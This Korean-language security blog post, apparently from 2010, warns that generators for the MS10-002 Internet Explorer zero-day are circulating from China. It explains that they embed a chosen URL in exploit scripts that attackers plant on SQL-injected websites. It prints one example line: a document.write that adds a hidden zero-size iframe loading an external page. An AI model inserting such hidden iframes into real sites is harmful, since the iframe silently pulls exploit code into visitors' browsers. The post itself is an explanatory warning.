반응형
(그림1. MS10-002 취약점 생성기)
MicroSoft Internet Explorer 0-Day 취약점을 이용한 생성기가 중국쪽에서 많이 유포되고 있다.
위의 생성기들에 들어있는 주소는 임의로 작성한 내용이며,
사용자가 원하는 주소를 입력하여 생성시키면, 취약점 스크립트에 입력주소가 포함되어 생성된다.
생성 된 스크립트 파일은 차후 iframe 명령어 등을 이용하여, SQL인젝션 공격이 된 홈페이지에 추가적으로 생성 될 수 있다.
Ex) SQL에 사용 될 수 있는 코드
document.write('<iframe width=0 height=0 src=http://kjcc2.tistory.com/test/yeren.htm></iframe>');
(그림2. 생성기를 이용하여 생성 된 취약점 스크립트 파일)
(그림3. 생성기를 이용하여 생성 된 취약점 스크립트 파일 내부화면)
(그림4. 생성 된 스크립트 파일을 복호화 하면, 사용자가 입력 한 주소를 포함하고 있는 화면)
'IT 보안소식' 카테고리의 다른 글
| 도로 광고판에 '포르노' 영상상영, 해킹의 위험도 높아져! (0) | 2010.02.03 |
|---|---|
| "아이폰 빼고 다 뚫렸다" 국내 스마트폰 보안 '비상' (5) | 2010.02.02 |
| 사업제휴를 가장한 스팸메일(Adobe 0-Day PDF) (2) | 2010.02.01 |
| 인터넷 익스플로러6.0으로 3월1일부터 구글 못 쓴다 (0) | 2010.02.01 |
| 구글(Google)의 동생? 구제(Goojje.com)사이트 등장 (4) | 2010.01.29 |
댓글